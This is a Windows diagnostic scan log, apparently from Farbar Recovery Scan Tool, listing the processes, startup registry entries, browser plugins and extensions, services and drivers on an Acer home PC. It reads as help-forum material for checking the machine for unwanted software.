() C:\Program Files (x86)\DivX\DivX Update\DivXUpdate.exe
(Apple Inc.) C:\Program Files (x86)\iTunes\iTunesHelper.exe
(Oracle Corporation) C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe
(Audible, Inc.) C:\Program Files (x86)\Audible\Bin\AudibleDownloadHelper.exe
() C:\Program Files (x86)\Northstar\SmartCopy\SmartCopy.exe
(North Star com.) C:\Program Files (x86)\Northstar\SmartLauncher\SmartLauncher.exe
(Apple Inc.) C:\Program Files\iPod\bin\iPodService.exe
(Microsoft Corporation) C:\Program Files\Windows Home Server\WHSTrayApp.exe
(pdfforge  hxxp://www.pdfforge.org/) C:\Program Files (x86)\Common Files\PDFCreator\PDFCreator.exe
(NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\Display\nvtray.exe
(Hauppauge Computer Works, Inc.) C:\Program Files (x86)\WinTV\WinTV7\WinTVTray.exe
(Brother Industries, Ltd.) C:\Program Files (x86)\Brother\Brmfcmon\BrMfimon.exe
(Dropbox, Inc.) C:\Users\*****\AppData\Roaming\Dropbox\bin\Dropbox.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\UNS\UNS.exe
(TrueCrypt Foundation) C:\Program Files\TrueCrypt\TrueCrypt.exe
(VMware, Inc.) C:\Windows\SysWOW64\vmnat.exe
(VMware, Inc.) C:\Windows\SysWOW64\vmnetdhcp.exe
(VMware, Inc.) C:\Program Files (x86)\VMware\VMware Player\vmware-authd.exe
(TeamViewer GmbH) C:\Program Files (x86)\TeamViewer\Version9\TeamViewer_Service.exe
(Microsoft Corporation) C:\Program Files (x86)\Microsoft LifeCam\LifeTray.exe
(Microsoft Corporation) C:\Program Files (x86)\Microsoft LifeCam\LifeEnC2.exe
(Microsoft Corporation) C:\Windows\System32\prevhost.exe
(Helios Software Solutions) C:\Program Files (x86)\TextPad 4\TextPad.exe
(Mozilla Corporation) C:\Program Files (x86)\Mozilla Firefox\firefox.exe
(Adobe Systems, Inc.) C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerPlugin_11_9_900_170.exe
(Adobe Systems, Inc.) C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerPlugin_11_9_900_170.exe


==================== Registry (Whitelisted) ==================

HKLM\...\Run: [mwlDaemon] - C:\Program Files (x86)\EgisTec\MyWinLocker 3\x86\mwlDaemon.exe [349480 2009-09-10] (Egis Technology Inc.)
HKLM\...\Run: [IAAnotif] - C:\Program Files (x86)\Intel\Intel Matrix Storage Manager\iaanotif.exe [186904 2009-10-13] (Intel Corporation)
HKLM\...\Run: [RtHDVCpl] - C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe [8312352 2009-10-28] (Realtek Semiconductor)
HKLM\...\Run: [OOTag] - C:\windows\oobeoffer\oobeoffer\ootag.exe [23072 2009-09-28] (Microsoft)
HKLM\...\Run: [Acronis Scheduler2 Service] - C:\Program Files (x86)\Common Files\Acronis\Schedule2\schedhlp.exe [140568 2007-08-31] (Acronis)
HKLM\...\Run: [VX1000] - C:\Windows\vVX1000.exe [762736 2010-05-20] (Microsoft Corporation)
HKLM\...\Run: [Windows Mobile Device Center] - C:\Windows\WindowsMobile\wmdc.exe [660360 2007-05-31] (Microsoft Corporation)
HKLM\...\Run: [MSC] - C:\Program Files\Microsoft Security Client\msseces.exe [1266912 2013-10-23] (Microsoft Corporation)
HKLM\...\Run: [AdobeAAMUpdater-1.0] - C:\Program Files (x86)\Common Files\Adobe\OOBE\PDApp\UWA\UpdaterStartupUtility.exe [472992 2013-03-21] (Adobe Systems Incorporated)
HKLM-x32\...\Run: [JMB36X IDE Setup] - C:\Windows\RaidTool\xInsIDE.exe [36864 2007-03-20] ()
HKLM-x32\...\Run: [BackupManagerTray] - C:\Program Files (x86)\NewTech Infosystems\Acer Backup Manager\BackupManagerTray.exe [261888 2009-08-12] (NewTech Infosystems, Inc.)
HKLM-x32\...\Run: [Hotkey Utility] - C:\Program Files (x86)\Acer\Hotkey Utility\HotkeyUtility.exe [609312 2010-05-06] ()
HKLM-x32\...\Run: [EgisTecLiveUpdate] - C:\Program Files (x86)\EgisTec Egis Software Update\EgisUpdate.exe [199464 2009-08-04] (Egis Technology Inc.)
HKLM-x32\...\Run: [ArcadeDeluxeAgent] - C:\Program Files (x86)\Acer Arcade Deluxe\Acer Arcade Deluxe\ArcadeDeluxeAgent.exe [128296 2009-11-16] (CyberLink Corp.)
HKLM-x32\...\Run: [PlayMovie] - C:\Program Files (x86)\Acer Arcade Deluxe\PlayMovie\PMVService.exe [181480 2009-11-12] (Acer Corp.)
HKLM-x32\...\Run: [TrayServer] - C:\Program Files (x86)\MAGIX\Video_deluxe_15\Trayserver.exe [90112 2008-08-07] (MAGIX AG)
HKLM-x32\...\Run: [Adobe Version Cue CS2] - C:\Program Files (x86)\Adobe\Adobe Version Cue CS2\ControlPanel\VersionCueCS2Tray.exe [856064 2005-04-06] (Adobe Sytems Incorporated)
HKLM-x32\...\Run: [Acrobat Assistant 7.0] - C:\Program Files (x86)\Adobe\Adobe Acrobat 7.0\Distillr\acrotray.exe [483328 2008-04-23] (Adobe Systems Inc.)
HKLM-x32\...\Run: [] - [x]
HKLM-x32\...\Run: [BrMfcWnd] - C:\Program Files (x86)\Brother\Brmfcmon\BrMfcWnd.exe [1159168 2009-05-26] (Brother Industries, Ltd.)
HKLM-x32\...\Run: [ControlCenter3] - C:\Program Files (x86)\Brother\ControlCenter3\brctrcen.exe [114688 2008-12-24] (Brother Industries, Ltd.)
HKLM-x32\...\Run: [TrueImageMonitor.exe] - C:\Program Files (x86)\Acronis\TrueImageHome\TrueImageMonitor.exe [2622232 2007-08-31] (Acronis)
HKLM-x32\...\Run: [AcronisTimounterMonitor] - C:\Program Files (x86)\Acronis\TrueImageHome\TimounterMonitor.exe [907040 2007-08-31] (Acronis)
HKLM-x32\...\Run: [Google Desktop Search] - C:\Program Files (x86)\Google\Google Desktop Search\GoogleDesktop.exe [30192 2010-12-20] (Google)
HKLM-x32\...\Run: [LifeCam] - C:\Program Files (x86)\Microsoft LifeCam\LifeExp.exe [119152 2010-05-20] (Microsoft Corporation)
HKLM-x32\...\Run: [DivXUpdate] - C:\Program Files (x86)\DivX\DivX Update\DivXUpdate.exe [1259376 2011-07-29] ()
HKLM-x32\...\Run: [Adobe ARM] - C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe [959904 2013-11-21] (Adobe Systems Incorporated)
HKLM-x32\...\Run: [APSDaemon] - C:\Program Files (x86)\Common Files\Apple\Apple Application Support\APSDaemon.exe [59280 2012-11-28] (Apple Inc.)
HKLM-x32\...\Run: [iTunesHelper] - C:\Program Files (x86)\iTunes\iTunesHelper.exe [152544 2012-12-12] (Apple Inc.)
HKLM-x32\...\Run: [SunJavaUpdateSched] - C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe [254336 2013-07-02] (Oracle Corporation)
HKCU\...\Run: [swg] - C:\Program Files (x86)\Google\GoogleToolbarNotifier\GoogleToolbarNotifier.exe [39408 2009-11-18] (Google Inc.)
HKCU\...\Run: [updateMgr] - C:\Program Files (x86)\Adobe\Adobe Acrobat 7.0\Acrobat\AdobeUpdateManager.exe [313472 2006-03-30] (Adobe Systems Incorporated)
HKCU\...\Run: [KiesTrayAgent] - C:\Program Files (x86)\Samsung\Kies\/\KiesTrayAgent.exe [3365176 2010-05-14] (Samsung Electronics Co., Ltd.)
MountPoints2: {a6801d55-6f88-11e3-9574-90fba686407f} - I:\AutoRun.exe
MountPoints2: {a6801d61-6f88-11e3-9574-90fba686407f} - I:\AutoRun.exe
HKU\Admin\...\Run: [swg] - C:\Program Files (x86)\Google\GoogleToolbarNotifier\GoogleToolbarNotifier.exe [39408 2009-11-18] (Google Inc.)
HKU\Default\...\RunOnce: [ScrSav] - C:\Program Files (x86)\Acer\Screensaver\run_Acer.exe [162336 2009-07-22] ()
HKU\Default User\...\RunOnce: [ScrSav] - C:\Program Files (x86)\Acer\Screensaver\run_Acer.exe [162336 2009-07-22] ()
HKU\UpdatusUser\...\RunOnce: [ScrSav] - C:\Program Files (x86)\Acer\Screensaver\run_Acer.exe [162336 2009-07-22] ()
AppInit_DLLs-x32: C:\PROGRA~2\Google\GOOGLE~3\GO36F4~1.DLL [123392 2010-12-20] (Google)
Lsa: [Authentication Packages] msv1_0 relog_ap
Startup: C:\Users\*****\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Dropbox.lnk
ShortcutTarget: Dropbox.lnk -> C:\Users\*****\AppData\Roaming\Dropbox\bin\Dropbox.exe (Dropbox, Inc.)

==================== Internet (Whitelisted) ====================

HKCU\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://homepage.acer.com/rdr.aspx?b=ACAW&l=0407&m=aspire_m7811&r=17361210n705pe426v155w5741u221
HKCU\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://homepage.acer.com/rdr.aspx?b=ACAW&l=0407&m=aspire_m7811&r=17361210n705pe426v155w5741u221
SearchScopes: HKLM-x32 - {67A2568C-7A0A-4EED-AECC-B5405DE63B64} URL = hxxp://www.google.com/search?sourceid=ie7&q={searchTerms}&rls=com.microsoft:{language}:{referrer:source?}&ie={inputEncoding}&oe={outputEncoding}&rlz=1I7ACAW
SearchScopes: HKCU - {67A2568C-7A0A-4EED-AECC-B5405DE63B64} URL = hxxp://www.google.com/search?sourceid=ie7&q={searchTerms}&rls=com.microsoft:{language}:{referrer:source?}&ie={inputEncoding}&oe={outputEncoding}&rlz=1I7ACAW_deAT409AT409
BHO: Easy Photo Print - {9421DD08-935F-4701-A9CA-22DF90AC4EA6} - C:\Program Files (x86)\Epson Software\Easy Photo Print\EPTBL.dll (SEIKO EPSON CORPORATION / CyCom Technology Corp.)
BHO: BrowserHelper Class - {9A065C65-4EE7-4DDD-9918-F129089A894A} - C:\Program Files\Windows Home Server\WHSDeskBands.dll (Microsoft Corporation)
BHO: Google Toolbar Helper - {AA58ED58-01DD-4d91-8333-CF10577473F7} - C:\Program Files (x86)\Google\Google Toolbar\GoogleToolbar_64.dll (Google Inc.)
BHO-x32: Adobe PDF Reader - {06849E9F-C8D7-4D59-B87D-784B7D6BE0B3} - C:\Program Files (x86)\Common Files\Adobe\Acrobat\ActiveX\AcroIEHelper.dll (Adobe Systems Incorporated)
BHO-x32: No Name - {5C255C8A-E604-49b4-9D64-90988571CECB} -  No File
BHO-x32: Java(tm) Plug-In SSV Helper - {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} - C:\Program Files (x86)\Java\jre7\bin\ssv.dll (Oracle Corporation)
BHO-x32: Windows Live Anmelde-Hilfsprogramm - {9030D464-4C02-4ABF-8ECC-5164760863C6} - C:\Program Files (x86)\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll (Microsoft Corporation)
BHO-x32: Google Toolbar Helper - {AA58ED58-01DD-4d91-8333-CF10577473F7} - C:\Program Files (x86)\Google\Google Toolbar\GoogleToolbar_32.dll (Google Inc.)
BHO-x32: Adobe PDF Conversion Toolbar Helper - {AE7CD045-E861-484f-8273-0445EE161910} - C:\Program Files (x86)\Adobe\Adobe Acrobat 7.0\Acrobat\AcroIEFavClient.dll (Adobe Systems Incorporated)
BHO-x32: Java(tm) Plug-In 2 SSV Helper - {DBC80044-A445-435b-BC74-9C25C1C588A9} - C:\Program Files (x86)\Java\jre7\bin\jp2ssv.dll (Oracle Corporation)
Toolbar: HKLM - Easy Photo Print - {9421DD08-935F-4701-A9CA-22DF90AC4EA6} - C:\Program Files (x86)\Epson Software\Easy Photo Print\EPTBL.dll (SEIKO EPSON CORPORATION / CyCom Technology Corp.)
Toolbar: HKLM - Home Server Banner - {D73E76A3-F902-45BD-8FC8-95AE8E014671} - C:\Program Files\Windows Home Server\WHSDeskBands.dll (Microsoft Corporation)
Toolbar: HKLM - Google Toolbar - {2318C2B1-4965-11d4-9B18-009027A5CD4F} - C:\Program Files (x86)\Google\Google Toolbar\GoogleToolbar_64.dll (Google Inc.)
Toolbar: HKLM-x32 - Adobe PDF - {47833539-D0C5-4125-9FA8-0819E2EAAC93} - C:\Program Files (x86)\Adobe\Adobe Acrobat 7.0\Acrobat\AcroIEFavClient.dll (Adobe Systems Incorporated)
Toolbar: HKLM-x32 - Google Toolbar - {2318C2B1-4965-11d4-9B18-009027A5CD4F} - C:\Program Files (x86)\Google\Google Toolbar\GoogleToolbar_32.dll (Google Inc.)
Toolbar: HKCU - Google Toolbar - {2318C2B1-4965-11D4-9B18-009027A5CD4F} - C:\Program Files (x86)\Google\Google Toolbar\GoogleToolbar_64.dll (Google Inc.)
Toolbar: HKCU - No Name - {47833539-D0C5-4125-9FA8-0819E2EAAC93} -  No File
Toolbar: HKCU - Home Server Banner - {D73E76A3-F902-45BD-8FC8-95AE8E014671} - C:\Program Files\Windows Home Server\WHSDeskBands.dll (Microsoft Corporation)
Handler-x32: http\0x00000001 - {E1D2BF42-A96B-11d1-9C6B-0000F875AC61} - C:\Program Files (x86)\Common Files\System\OLE DB\msdaipp.dll (Microsoft Corporation)
Handler-x32: http\oledb - {E1D2BF40-A96B-11d1-9C6B-0000F875AC61} - C:\Program Files (x86)\Common Files\System\OLE DB\msdaipp.dll (Microsoft Corporation)
Handler-x32: https\0x00000001 - {E1D2BF42-A96B-11d1-9C6B-0000F875AC61} - C:\Program Files (x86)\Common Files\System\OLE DB\msdaipp.dll (Microsoft Corporation)
Handler-x32: https\oledb - {E1D2BF40-A96B-11d1-9C6B-0000F875AC61} - C:\Program Files (x86)\Common Files\System\OLE DB\msdaipp.dll (Microsoft Corporation)
Handler-x32: livecall - {828030A1-22C1-4009-854F-8E305202313F} - C:\Program Files (x86)\Windows Live\Messenger\msgrapp.14.0.8089.0726.dll (Microsoft Corporation)
Handler-x32: msdaipp\0x00000001 - {E1D2BF42-A96B-11d1-9C6B-0000F875AC61} - C:\Program Files (x86)\Common Files\System\OLE DB\msdaipp.dll (Microsoft Corporation)
Handler-x32: msdaipp\oledb - {E1D2BF40-A96B-11d1-9C6B-0000F875AC61} - C:\Program Files (x86)\Common Files\System\OLE DB\msdaipp.dll (Microsoft Corporation)
Handler-x32: msnim - {828030A1-22C1-4009-854F-8E305202313F} - C:\Program Files (x86)\Windows Live\Messenger\msgrapp.14.0.8089.0726.dll (Microsoft Corporation)
Tcpip\Parameters: [DhcpNameServer] 192.168.178.1
Tcpip\..\Interfaces\{A8B01E69-7297-4C38-B3E3-40775DDD3E9E}: [NameServer]213.94.78.17 213.94.78.16

FireFox:
========
FF ProfilePath: C:\Users\*****\AppData\Roaming\Mozilla\Firefox\Profiles\v60bhm7j.default
FF Homepage: hxxp://www.starobserver.org|hxxp://news.astronomie.info/
FF Keyword.URL: hxxp://search.skipity.com/?source=ab&q=
FF Plugin: @adobe.com/FlashPlayer - C:\Windows\system32\Macromed\Flash\NPSWF64_11_9_900_170.dll ()
FF Plugin: @divx.com/DivX VOD Helper,version=1.0.0 - C:\Program Files\DivX\DivX OVS Helper\npovshelper.dll (DivX, LLC.)
FF Plugin: @microsoft.com/GENUINE - disabled No File
FF Plugin: @Microsoft.com/NpCtrl,version=1.0 - C:\Program Files\Microsoft Silverlight\5.1.20913.0\npctrl.dll ( Microsoft Corporation)
FF Plugin: adobe.com/AdobeAAMDetect - C:\Program Files (x86)\Common Files\Adobe\OOBE\PDApp\CCM\Utilities\npAdobeAAMDetect64.dll (Adobe Systems)
FF Plugin-x32: @adobe.com/FlashPlayer - C:\Windows\SysWOW64\Macromed\Flash\NPSWF32_11_9_900_170.dll ()
FF Plugin-x32: @Apple.com/iTunes,version=1.0 - C:\Program Files (x86)\iTunes\Mozilla Plugins\npitunes.dll ()
FF Plugin-x32: @divx.com/DivX VOD Helper,version=1.0.0 - C:\Program Files (x86)\DivX\DivX OVS Helper\npovshelper.dll (DivX, LLC.)
FF Plugin-x32: @Google.com/GoogleEarthPlugin - C:\Program Files (x86)\Google\Google Earth\plugin\npgeplugin.dll (Google)
FF Plugin-x32: @google.com/npPicasa3,version=3.0.0 - C:\Program Files (x86)\Google\Picasa3\npPicasa3.dll (Google, Inc.)
FF Plugin-x32: @java.com/DTPlugin,version=10.45.2 - C:\Program Files (x86)\Java\jre7\bin\dtplugin\npDeployJava1.dll (Oracle Corporation)
FF Plugin-x32: @java.com/JavaPlugin,version=10.45.2 - C:\Program Files (x86)\Java\jre7\bin\plugin2\npjp2.dll (Oracle Corporation)
FF Plugin-x32: @microsoft.com/GENUINE - disabled No File
FF Plugin-x32: @Microsoft.com/NpCtrl,version=1.0 - C:\Program Files (x86)\Microsoft Silverlight\5.1.20913.0\npctrl.dll ( Microsoft Corporation)
FF Plugin-x32: @microsoft.com/OfficeLive,version=1.5 - C:\Program Files (x86)\Microsoft\Office Live\npOLW.dll (Microsoft Corp.)
FF Plugin-x32: @microsoft.com/WLPG,version=14.0.8081.0709 - C:\Program Files (x86)\Windows Live\Photo Gallery\NPWLPG.dll (Microsoft Corporation)
FF Plugin-x32: @nvidia.com/3DVision - C:\Program Files (x86)\NVIDIA Corporation\3D Vision\npnv3dv.dll (NVIDIA Corporation)
FF Plugin-x32: @nvidia.com/3DVisionStreaming - C:\Program Files (x86)\NVIDIA Corporation\3D Vision\npnv3dvstreaming.dll (NVIDIA Corporation)
FF Plugin-x32: @t-immersion.com/DFusionHomeWebPlugIn - C:\Program Files (x86)\Total Immersion\DFusionHomeWebPlugIn\NPDFusionWebFirefox.dll (Total Immersion)
FF Plugin-x32: @tools.google.com/Google Update;version=3 - C:\Program Files (x86)\Google\Update\1.3.22.3\npGoogleUpdate3.dll (Google Inc.)
FF Plugin-x32: @tools.google.com/Google Update;version=9 - C:\Program Files (x86)\Google\Update\1.3.22.3\npGoogleUpdate3.dll (Google Inc.)
FF Plugin-x32: @videolan.org/vlc,version=2.0.1 - C:\Program Files (x86)\VideoLAN\VLC\npvlc.dll (VideoLAN)
FF Plugin-x32: Adobe Reader - C:\Program Files (x86)\Adobe\Reader 11.0\Reader\AIR\nppdf32.dll (Adobe Systems Inc.)
FF Plugin-x32: adobe.com/AdobeAAMDetect - C:\Program Files (x86)\Common Files\Adobe\OOBE\PDApp\CCM\Utilities\npAdobeAAMDetect32.dll (Adobe Systems)
FF Plugin HKCU: amazon.com/AmazonMP3DownloaderPlugin - C:\Program Files (x86)\Amazon\MP3 Downloader\npAmazonMP3DownloaderPlugin101721.dll (Amazon.com, Inc.)
FF Plugin ProgramFiles/Appdata: C:\Program Files (x86)\mozilla firefox\plugins\NPOFF12.DLL (Microsoft Corporation)
FF Plugin ProgramFiles/Appdata: C:\Program Files (x86)\mozilla firefox\plugins\nppdf32.dll (Adobe Systems Inc.)
FF SearchPlugin: C:\Users\*****\AppData\Roaming\Mozilla\Firefox\Profiles\v60bhm7j.default\searchplugins\s-amazon.xml
FF SearchPlugin: C:\Users\*****\AppData\Roaming\Mozilla\Firefox\Profiles\v60bhm7j.default\searchplugins\skipity-search.xml
FF SearchPlugin: C:\Program Files (x86)\mozilla firefox\searchplugins\googledesktop.xml
FF SearchPlugin: C:\Program Files (x86)\mozilla firefox\browser\searchplugins\amazondotcom-de.xml
FF SearchPlugin: C:\Program Files (x86)\mozilla firefox\browser\searchplugins\eBay-de.xml
FF SearchPlugin: C:\Program Files (x86)\mozilla firefox\browser\searchplugins\leo_ende_de.xml
FF SearchPlugin: C:\Program Files (x86)\mozilla firefox\browser\searchplugins\yahoo-de.xml
FF Extension: German Dictionary - C:\Users\*****\AppData\Roaming\Mozilla\Firefox\Profiles\v60bhm7j.default\Extensions\de-DE@dictionaries.addons.mozilla.org [2012-10-14]
FF Extension: Print pages to PDF - C:\Users\*****\AppData\Roaming\Mozilla\Firefox\Profiles\v60bhm7j.default\Extensions\printPages2Pdf@reinhold.ripper [2013-11-12]
FF Extension: WOT - C:\Users\*****\AppData\Roaming\Mozilla\Firefox\Profiles\v60bhm7j.default\Extensions\{a0d7ccb3-214d-498b-b4aa-0e8fda9a7bf7} [2013-11-28]
FF Extension: Firebug - C:\Users\*****\AppData\Roaming\Mozilla\Firefox\Profiles\v60bhm7j.default\Extensions\firebug@software.joehewitt.com.xpi [2013-09-23]
FF Extension: Write Area - C:\Users\*****\AppData\Roaming\Mozilla\Firefox\Profiles\v60bhm7j.default\Extensions\writearea@writearea.com.xpi [2012-10-22]
FF Extension: Web Developer - C:\Users\*****\AppData\Roaming\Mozilla\Firefox\Profiles\v60bhm7j.default\Extensions\{c45c406e-ab73-11d8-be73-000a95be3b12}.xpi [2012-08-15]
FF Extension: Adblock Plus - C:\Users\*****\AppData\Roaming\Mozilla\Firefox\Profiles\v60bhm7j.default\Extensions\{d10d0bf8-f5b5-c8b4-a8b2-2b9879e08c5d}.xpi [2013-10-19]
FF Extension: Anti-Banner - C:\Program Files (x86)\Mozilla Firefox\extensions\KavAntiBanner@kaspersky.ru_bak [2013-12-12]
FF Extension: Modul zur Link-Untersuchung - C:\Program Files (x86)\Mozilla Firefox\extensions\linkfilter@kaspersky.ru_bak [2013-12-12]
FF Extension: Java Console - C:\Program Files (x86)\Mozilla Firefox\extensions\{CAFEEFAC-0016-0000-0033-ABCDEFFEDCBA} [2013-12-12]
FF HKLM-x32\...\Firefox\Extensions: [virtualKeyboard@kaspersky.ru] - C:\Program Files (x86)\Kaspersky Lab\Kaspersky Internet Security 2011\FFExt\virtualKeyboard@kaspersky.ru
FF HKLM-x32\...\Firefox\Extensions: [KavAntiBanner@Kaspersky.ru] - C:\Program Files (x86)\Kaspersky Lab\Kaspersky Internet Security 2011\FFExt\KavAntiBanner@kaspersky.ru
FF HKLM-x32\...\Firefox\Extensions: [linkfilter@kaspersky.ru] - C:\Program Files (x86)\Kaspersky Lab\Kaspersky Internet Security 2011\FFExt\linkfilter@kaspersky.ru

Chrome: 
=======
CHR Plugin: (Shockwave Flash) - C:\Program Files (x86)\Google\Chrome\Application\26.0.1410.64\PepperFlash\pepflashplayer.dll No File
CHR Plugin: (Chrome Remote Desktop Viewer) - internal-remoting-viewer
CHR Plugin: (Native Client) - C:\Program Files (x86)\Google\Chrome\Application\26.0.1410.64\ppGoogleNaClPluginChrome.dll No File
CHR Plugin: (Chrome PDF Viewer) - C:\Program Files (x86)\Google\Chrome\Application\26.0.1410.64\pdf.dll No File
CHR Plugin: (Adobe Acrobat) - C:\Program Files (x86)\Adobe\Reader 11.0\Reader\Browser\nppdf32.dll (Adobe Systems Inc.)
CHR Plugin: (2007 Microsoft Office system) - C:\Program Files (x86)\Mozilla Firefox\plugins\NPOFF12.DLL (Microsoft Corporation)
CHR Plugin: (AmazonMP3DownloaderPlugin) - C:\Program Files (x86)\Amazon\MP3 Downloader\npAmazonMP3DownloaderPlugin101721.dll (Amazon.com, Inc.)
CHR Plugin: (DivX VOD Helper Plug-in) - C:\Program Files (x86)\DivX\DivX OVS Helper\npovshelper.dll (DivX, LLC.)
CHR Plugin: (Google Earth Plugin) - C:\Program Files (x86)\Google\Google Earth\plugin\npgeplugin.dll (Google)
CHR Plugin: (Picasa) - C:\Program Files (x86)\Google\Picasa3\npPicasa3.dll (Google, Inc.)
CHR Plugin: (Google Update) - C:\Program Files (x86)\Google\Update\1.3.21.135\npGoogleUpdate3.dll No File
CHR Plugin: (Java(TM) Platform SE 7 U17) - C:\Program Files (x86)\Java\jre7\bin\plugin2\npjp2.dll (Oracle Corporation)
CHR Plugin: (Silverlight Plug-In) - C:\Program Files (x86)\Microsoft Silverlight\5.1.20125.0\npctrl.dll No File
CHR Plugin: (Microsoft Office Live Plug-in for Firefox) - C:\Program Files (x86)\Microsoft\Office Live\npOLW.dll (Microsoft Corp.)
CHR Plugin: (NVIDIA 3D Vision) - C:\Program Files (x86)\NVIDIA Corporation\3D Vision\npnv3dv.dll (NVIDIA Corporation)
CHR Plugin: (NVIDIA 3D VISION) - C:\Program Files (x86)\NVIDIA Corporation\3D Vision\npnv3dvstreaming.dll (NVIDIA Corporation)
CHR Plugin: (D'Fusion @Home Web Plug-In (3.20.20164)) - C:\Program Files (x86)\Total Immersion\DFusionHomeWebPlugIn\NPDFusionWebFirefox.dll (Total Immersion)
CHR Plugin: (VLC Web Plugin) - C:\Program Files (x86)\VideoLAN\VLC\npvlc.dll (VideoLAN)
CHR Plugin: (Windows Live\u00AE Photo Gallery) - C:\Program Files (x86)\Windows Live\Photo Gallery\NPWLPG.dll (Microsoft Corporation)
CHR Plugin: (iTunes Application Detector) - C:\Program Files (x86)\iTunes\Mozilla Plugins\npitunes.dll ()
CHR Plugin: (Shockwave Flash) - C:\Windows\SysWOW64\Macromed\Flash\NPSWF32_11_7_700_169.dll No File
CHR Plugin: (Java Deployment Toolkit 7.0.170.2) - C:\Windows\SysWOW64\npDeployJava1.dll No File
CHR Extension: (Google Docs) - C:\Users\*****\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake\0.5_0 [2013-10-11]
CHR Extension: (Google Drive) - C:\Users\*****\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf\6.3_0 [2013-10-11]
CHR Extension: (YouTube) - C:\Users\*****\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo\4.2.6_0 [2013-10-11]
CHR Extension: (Google Search) - C:\Users\*****\AppData\Local\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf\0.0.0.20_0 [2013-10-11]
CHR Extension: (Chrome In-App Payments service) - C:\Users\*****\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\0.0.4.11_0 [2013-10-11]
CHR Extension: (Gmail) - C:\Users\*****\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia\7_0 [2013-04-19]

==================== Services (Whitelisted) =================

S3 Adobe LM Service; C:\Program Files (x86)\Common Files\Adobe Systems Shared\Service\Adobelmsvc.exe [72704 2010-12-18] (Adobe Systems)
R2 Adobe Version Cue CS2; C:\Program Files (x86)\Adobe\Adobe Version Cue CS2\bin\VersionCueCS2.exe [163840 2005-04-06] (Adobe Systems Incorporated)
R2 arXfrSvc; C:\Program Files\Windows Home Server\Microsoft.HomeServer.Archive.TransferService.exe [231280 2011-01-10] (Microsoft Corporation)
R2 avmike; C:\Program Files\FRITZ!Fernzugang\avmike.exe [335224 2010-03-30] (AVM Berlin)
R2 certsrv; C:\Program Files\FRITZ!Fernzugang\certsrv.exe [143224 2010-03-30] (AVM Berlin)
R2 dgdersvc; C:\Windows\SysWOW64\dgdersvc.exe [95568 2010-05-13] (Devguru Co., Ltd.)
R2 esClient; C:\Program Files\Windows Home Server\esClient.exe [109936 2011-01-10] (Microsoft Corporation)
R2 FirebirdGuardianHS3SRInstance; C:\HS3 Hotelsoftware\DB-Server\bin\fbguard_hs3sr.exe [1265664 2011-01-17] ()
R3 FirebirdServerHS3SRInstance; C:\HS3 Hotelsoftware\DB-Server\bin\fbserver_hs3sr.exe [3735552 2011-01-17] (Firebird Project)
S3 FirebirdServerMAGIXInstance; C:\Program Files (x86)\MAGIX\Common\Database\bin\fbserver.exe [1527900 2005-11-17] (MAGIX®)
S3 GoogleDesktopManager-051210-111108; C:\Program Files (x86)\Google\Google Desktop Search\GoogleDesktop.exe [30192 2010-12-20] (Google)
R2 HauppaugeTVServer; C:\Program Files (x86)\WinTV\TVServer\HauppaugeTVServer.exe [577024 2012-03-24] (Hauppauge Computer Works)
R2 HWDeviceService64.exe; C:\ProgramData\DatacardService\HWDeviceService64.exe [346976 2011-03-14] ()
S3 KiesAllShare; C:\Program Files (x86)\Samsung\Kies\WiselinkPro\WiselinkPro.exe [9241088 2010-05-13] ()
S3 Macromedia Licensing Service; C:\Program Files (x86)\Common Files\Macromedia Shared\Service\Macromedia Licensing.exe [68096 2010-12-19] ()
R2 MBAMScheduler; C:\Program Files (x86)\Malwarebytes' Anti-Malware\mbamscheduler.exe [418376 2013-04-04] (Malwarebytes Corporation)
R2 MBAMService; C:\Program Files (x86)\Malwarebytes' Anti-Malware\mbamservice.exe [701512 2013-04-04] (Malwarebytes Corporation)
R2 MsMpSvc; C:\Program Files\Microsoft Security Client\MsMpEng.exe [23808 2013-10-23] (Microsoft Corporation)
R2 MWLService; C:\Program Files (x86)\EgisTec\MyWinLocker 3\x86\\MWLService.exe [305448 2009-09-10] (Egis Technology Inc.)
S3 NisSrv; C:\Program Files\Microsoft Security Client\NisSrv.exe [348376 2013-10-23] (Microsoft Corporation)
R2 nwtsrv; C:\Program Files\FRITZ!Fernzugang\nwtsrv.exe [189304 2010-03-30] (AVM Berlin)
R2 TryAndDecideService; C:\Program Files (x86)\Common Files\Acronis\Fomatik\TrueImageTryStartService.exe [498872 2007-08-31] ()
R2 USBS3S4Detection; C:\OEM\USBDECTION\USBS3S4Detection.exe [76320 2009-12-09] ()
R2 WHSConnector; C:\Program Files\Windows Home Server\WHSConnector.exe [489840 2011-01-10] (Microsoft Corporation)

==================== Drivers (Whitelisted) ====================

R3 dgderdrv; C:\Windows\System32\drivers\dgderdrv.sys [20568 2010-05-13] (Devguru Co., Ltd)
R3 dgderdrv; C:\Windows\SysWOW64\drivers\dgderdrv.sys [18136 2010-05-13] (Devguru Co., Ltd)
S3 hcw17bda; C:\Windows\System32\drivers\hcw17bda.sys [67456 2010-01-27] (Hauppauge Computer Works, Inc.)
S3 huawei_wwanecm; C:\Windows\System32\DRIVERS\ew_juwwanecm.sys [242688 2012-12-22] (Huawei Technologies Co., Ltd.)
S4 Iaaidassi; No ImagePath
R3 MBAMProtector; C:\Windows\system32\drivers\mbam.sys [25928 2013-04-04] (Malwarebytes Corporation)
